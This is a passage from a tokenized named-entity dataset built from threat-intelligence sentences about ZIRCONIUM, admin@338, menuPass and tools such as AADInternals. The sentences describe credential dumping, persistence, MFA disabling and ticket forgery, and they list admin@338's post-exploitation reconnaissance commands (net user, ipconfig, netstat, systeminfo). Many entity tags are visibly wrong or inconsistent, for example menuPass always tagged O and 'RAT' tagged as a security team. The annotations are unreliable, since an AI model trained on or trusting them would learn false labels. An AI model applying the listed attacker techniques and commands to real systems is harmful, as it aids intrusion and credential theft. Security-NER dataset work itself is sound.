"B-Way", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "Python-based", "implants", "to", "interact", "with", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "query", "the", "Registry", "for", "proxy", "settings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "created", "a", "Registry", "Run", "key", "named", "<code>Dropbox", "Update", "Setup</code>", "to", "establish", "persistence", "for", "a", "malicious", "Python", "binary." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "multi-stage", "packers", "for", "exploit", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "malicious", "links", "in", "e-mails", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "web", "beacons", "in", "e-mails", "to", "track", "hits", "to", "attacker-controlled", "URL's." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "AES", "encrypted", "communications", "in", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "capture", "the", "processor", "architecture", "of", "a", "compromised", "host", "in", "order", "to", "register", "it", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "enumerate", "proxy", "settings", "in", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "capture", "the", "username", "on", "a", "compromised", "host", "in", "order", "to", "register", "it", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "capture", "the", "time", "on", "a", "compromised", "host", "in", "order", "to", "register", "it", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "GitHub", "to", "host", "malware", "linked", "in", "spearphishing", "e-mails." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ZIRCONIUM", "has", "used", "a", "tool", "to", "open", "a", "Windows", "Command", "Shell", "on", "a", "remote", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "has", "exploited", "client", "software", "vulnerabilities", "for", "execution,", "such", "as", "Microsoft", "Word", "CVE-2012-0158." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Exp", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "B-Features" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "commands", "after", "exploiting", "a", "machine", "with", "LOWBALL", "malware", "to", "obtain", "information", "about", "files", "and", "directories:", "<code>dir", "c:\\", ">>", "%temp%\\download</code>", "<code>dir", "\"c:\\Documents", "and", "Settings\"", ">>", "%temp%\\download</code>", "<code>dir", "\"c:\\Program", "Files\\\"", ">>", "%temp%\\download</code>", "<code>dir", "d:\\", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "commands", "following", "exploitation", "of", "a", "machine", "with", "LOWBALL", "malware", "to", "enumerate", "user", "accounts:", "<code>net", "user", ">>", "%temp%\\download</code>", "<code>net", "user", "/domain", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "command", "following", "exploitation", "of", "a", "machine", "with", "LOWBALL", "malware", "to", "list", "local", "groups:", "<code>net", "localgroup", "administrator", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "has", "attempted", "to", "get", "victims", "to", "launch", "malicious", "Microsoft", "Word", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "B-Way", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "command", "to", "rename", "one", "of", "their", "tools", "to", "a", "benign", "file", "name:", "<code>ren", "\"%temp%\\upload\"", "audiodg.exe</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "admin@338", "has", "sent", "emails", "with", "malicious", "Microsoft", "Office", "documents", "attached." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "commands", "after", "exploiting", "a", "machine", "with", "LOWBALL", "malware", "to", "obtain", "information", "about", "the", "OS:", "<code>ver", ">>", "%temp%\\download</code>", "<code>systeminfo", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "command", "after", "exploiting", "a", "machine", "with", "LOWBALL", "malware", "to", "acquire", "information", "about", "local", "networks:", "<code>ipconfig", "/all", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "command", "following", "exploitation", "of", "a", "machine", "with", "LOWBALL", "malware", "to", "display", "network", "connections:", "<code>netstat", "-ano", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "admin@338", "actors", "used", "the", "following", "command", "following", "exploitation", "of", "a", "machine", "with", "LOWBALL", "malware", "to", "obtain", "information", "about", "services:", "<code>net", "start", ">>", "%temp%\\download</code>" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Following", "exploitation", "with", "LOWBALL", "malware,", "admin@338", "actors", "created", "a", "file", "containing", "a", "list", "of", "commands", "to", "be", "executed", "on", "the", "compromised", "computer." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "encrypted", "files", "and", "information", "before", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "compressed", "files", "before", "exfiltration", "using", "TAR", "and", "RAR." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "menuPass", "has", "used", "the", "Csvde", "tool", "to", "collect", "Active", "Directory", "files", "and", "data." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "Wevtutil", "to", "remove", "PowerShell", "execution", "logs." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "menuPass", "has", "resized", "and", "added", "data", "to", "the", "certificate", "table", "to", "enable", "the", "signing", "of", "modified", "files", "with", "legitimate", "signatures." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "DLL", "search", "order", "hijacking." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Way", "I-Way", "O" ] }, { "tokens": [ "menuPass", "has", "used", "DLL", "side-loading", "to", "launch", "versions", "of", "Mimikatz", "and", "PwDump6", "as", "well", "as", "UPPERCUT." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "menuPass", "has", "collected", "various", "files", "from", "the", "compromised", "computers." ], "ner_tags": [ "O", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "collected", "data", "from", "remote", "systems", "by", "mounting", "network", "shares", "with", "<code>net", "use</code>", "and", "using", "Robocopy", "to", "transfer", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "menuPass", "has", "used", "certutil", "in", "a", "macro", "to", "decode", "base64-encoded", "content", "contained", "in", "a", "dropper", "document", "attached", "to", "an", "email.", "The", "group", "has", "also", "used", "<code>certutil", "-decode</code>", "to", "decode", "files", "on", "the", "victim’s", "machine", "when", "dropping", "UPPERCUT." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "menuPass", "has", "used", "the", "Microsoft", "administration", "tool", "csvde.exe", "to", "export", "Active", "Directory", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "registered", "malicious", "domains", "for", "use", "in", "intrusion", "campaigns." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "menuPass", "has", "encoded", "strings", "in", "its", "malware", "with", "base64", "as", "well", "as", "with", "a", "simple,", "single-byte", "XOR", "obfuscation", "using", "key", "0x40." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "leveraged", "vulnerabilities", "in", "Pulse", "Secure", "VPNs", "to", "hijack", "sessions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "tools", "to", "exploit", "the", "ZeroLogon", "vulnerability", "(CVE-2020-1472)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp", "B-Features" ] }, { "tokens": [ "menuPass", "has", "used", "a", "global", "service", "provider's", "IP", "as", "a", "proxy", "for", "C2", "traffic", "from", "a", "victim." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Org", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "dynamic", "DNS", "service", "providers", "to", "host", "malicious", "domains." ], "ner_tags": [ "O", "O", "O", "I-Org", "B-Purp", "I-Org", "I-Org", "O", "O", "O", "O" ] }, { "tokens": [ "A", "menuPass", "macro", "deletes", "files", "after", "it", "has", "decoded", "and", "decompressed", "them." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "searched", "compromised", "systems", "for", "folders", "of", "interest", "including", "those", "related", "to", "HR,", "audit", "and", "expense,", "and", "meeting", "memos." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "installed", "updates", "and", "new", "malware", "on", "victims." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "<code>InstallUtil.exe</code>", "to", "execute", "malicious", "software." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "key", "loggers", "to", "steal", "usernames", "and", "passwords." ], "ner_tags": [ "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "B-Purp" ] }, { "tokens": [ "menuPass", "has", "used", "a", "modified", "version", "of", "pentesting", "tools", "wmiexec.vbs", "and", "secretsdump.py", "to", "dump", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "menuPass", "stages", "data", "prior", "to", "exfiltration", "in", "multi-part", "archives,", "often", "saved", "in", "the", "Recycle", "Bin." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "attempted", "to", "get", "victims", "to", "open", "malicious", "files", "such", "as", "Windows", "Shortcuts", "(.lnk)", "and/or", "Microsoft", "Office", "documents,", "sent", "via", "email", "as", "part", "of", "spearphishing", "campaigns." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "I-Tool", "B-SecTeam", "B-SamFile", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "menuPass", "has", "used", "esentutl", "to", "change", "file", "extensions", "to", "their", "true", "type", "that", "were", "masquerading", "as", ".txt", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "menuPass", "has", "been", "seen", "changing", "malicious", "files", "to", "appear", "legitimate." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "Ntdsutil", "to", "dump", "credentials." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "native", "APIs", "including", "<code>GetModuleFileName</code>,", "<code>lstrcat</code>,", "<code>CreateFile</code>,", "and", "<code>ReadFile</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "tcping.exe,", "similar", "to", "Ping,", "to", "probe", "port", "status", "on", "systems", "of", "interest." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "uses", "PowerSploit", "to", "inject", "shellcode", "into", "PowerShell." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "process", "hollowing", "in", "iexplore.exe", "to", "load", "the", "RedLeaves", "implant." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "staged", "data", "on", "remote", "MSP", "systems", "or", "other", "victim", "networks", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "RDP", "connections", "to", "move", "across", "the", "victim", "network." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "uses", "scripts", "to", "enumerate", "IP", "ranges", "on", "the", "victim", "network.", "menuPass", "has", "also", "issued", "the", "command", "<code>net", "view", "/domain</code>", "to", "a", "PlugX", "implant", "to", "gather", "information", "about", "remote", "systems", "on", "the", "network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "renamed", "certutil", "and", "moved", "it", "to", "a", "different", "location", "on", "the", "system", "to", "avoid", "detection", "based", "on", "use", "of", "the", "tool." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "Putty", "Secure", "Copy", "Client", "(PSCP)", "to", "transfer", "data." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "B-Purp" ] }, { "tokens": [ "menuPass", "has", "used", "a", "script", "(atexec.py)", "to", "execute", "a", "command", "on", "a", "target", "machine", "via", "Task", "Scheduler." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "a", "modified", "version", "of", "pentesting", "tools", "wmiexec.vbs", "and", "secretsdump.py", "to", "dump", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "sent", "malicious", "Office", "documents", "via", "email", "as", "part", "of", "spearphishing", "campaigns", "as", "well", "as", "executables", "disguised", "as", "documents." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "several", "tools", "to", "scan", "for", "open", "NetBIOS", "nameservers", "and", "enumerate", "NetBIOS", "sessions." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "menuPass", "has", "used", "<code>net", "use</code>", "to", "conduct", "connectivity", "checks", "to", "machines." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "and", "modified", "open-source", "tools", "like", "Impacket,", "Mimikatz,", "and", "pwdump." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "menuPass", "has", "used", "legitimate", "access", "granted", "to", "Managed", "Service", "Providers", "in", "order", "to", "access", "victims", "of", "interest." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "valid", "accounts", "including", "shared", "between", "Managed", "Service", "Providers", "and", "clients", "to", "move", "between", "the", "two", "environments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "executes", "commands", "using", "a", "command-line", "interface", "and", "reverse", "shell.", "The", "group", "has", "used", "a", "modified", "version", "of", "pentesting", "script", "wmiexec.vbs", "to", "execute", "commands.", "menuPass", "has", "used", "malicious", "macros", "embedded", "inside", "Office", "documents", "to", "execute", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "menuPass", "has", "used", "a", "modified", "version", "of", "pentesting", "script", "wmiexec.vbs,", "which", "logs", "into", "a", "remote", "machine", "using", "WMI." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "3PARA", "RAT", "has", "a", "command", "to", "retrieve", "metadata", "for", "files", "on", "disk", "as", "well", "as", "a", "command", "to", "list", "the", "current", "working", "directory." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "3PARA", "RAT", "command", "and", "control", "commands", "are", "encrypted", "within", "the", "HTTP", "C2", "channel", "using", "the", "DES", "algorithm", "in", "CBC", "mode", "with", "a", "key", "derived", "from", "the", "MD5", "hash", "of", "the", "string", "HYF54&%9&jkMCXuiS.", "3PARA", "RAT", "will", "use", "an", "8-byte", "XOR", "key", "derived", "from", "the", "string", "HYF54&%9&jkMCXuiS", "if", "the", "DES", "decoding", "fails" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "3PARA", "RAT", "has", "a", "command", "to", "set", "certain", "attributes", "such", "as", "creation/modification", "timestamps", "on", "files." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "3PARA", "RAT", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "4H", "RAT", "has", "the", "capability", "to", "obtain", "file", "and", "directory", "listings." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "4H", "RAT", "has", "the", "capability", "to", "obtain", "a", "listing", "of", "running", "processes", "(including", "loaded", "modules)." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "4H", "RAT", "obfuscates", "C2", "communication", "using", "a", "1-byte", "XOR", "with", "the", "key", "0xBE." ], "ner_tags": [ "O", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "4H", "RAT", "sends", "an", "OS", "version", "identifier", "in", "its", "beacons." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "4H", "RAT", "uses", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "4H", "RAT", "has", "the", "capability", "to", "create", "a", "remote", "shell." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "enumerate", "Azure", "AD", "users." ], "ner_tags": [ "B-SamFile", "O", "O", "B-HackOrg", "I-Org", "O" ] }, { "tokens": [ "AADInternals", "can", "create", "new", "Azure", "AD", "users." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "AADInternals", "can", "execute", "commands", "on", "Azure", "virtual", "machines", "using", "the", "VM", "agent." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AADInternals", "can", "enumerate", "Azure", "AD", "groups." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "enumerate", "information", "about", "a", "variety", "of", "cloud", "services,", "such", "as", "Office", "365", "and", "Sharepoint", "instances", "or", "OpenID", "Configurations." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "AADInternals", "can", "gather", "unsecured", "credentials", "for", "Azure", "AD", "services,", "such", "as", "Azure", "AD", "Connect,", "from", "a", "local", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "collect", "files", "from", "a", "user’s", "OneDrive." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "register", "a", "device", "to", "Azure", "AD." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "gather", "information", "about", "a", "tenant’s", "domains", "using", "public", "Microsoft", "APIs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "check", "for", "the", "existence", "of", "user", "email", "addresses", "using", "public", "Microsoft", "APIs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "AADInternals", "can", "directly", "download", "cloud", "user", "data", "such", "as", "OneDrive", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "B-Features", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "AADInternals", "can", "inject", "a", "malicious", "DLL", "(`PTASpy`)", "into", "the", "`AzureADConnectAuthenticationAgentService`", "to", "backdoor", "Azure", "AD", "Pass-Through", "Authentication." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "dump", "secrets", "from", "the", "Local", "Security", "Authority." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "modify", "registry", "keys", "as", "part", "of", "setting", "a", "new", "pass-through", "authentication", "agent." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "AADInternals", "`Set-AADIntUserMFA`", "command", "can", "be", "used", "to", "disable", "MFA", "for", "a", "specified", "user." ], "ner_tags": [ "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "is", "written", "and", "executed", "via", "PowerShell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "AADInternals", "can", "gather", "encryption", "keys", "from", "Azure", "AD", "services", "such", "as", "ADSync", "and", "Active", "Directory", "Federated", "Services", "servers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "AADInternals", "can", "be", "used", "to", "create", "SAML", "tokens", "using", "the", "AD", "Federated", "Services", "token", "signing", "certificate." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "B-Tool", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "AADInternals", "can", "be", "used", "to", "forge", "Kerberos", "tickets", "using", "the", "password", "hash", "of", "the", "AZUREADSSOACC", "account." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AADInternals", "can", "send", "\"consent", "phishing\"", "emails", "containing", "malicious", "links", "designed", "to", "steal", "users’", "access", "tokens." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Purp" ] }, { "tokens": [ "AADInternals", "can", "send", "phishing", "emails", "containing", "malicious", "links", "designed", "to", "collect", "users’", "credentials." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "I-Way", "O", "O", 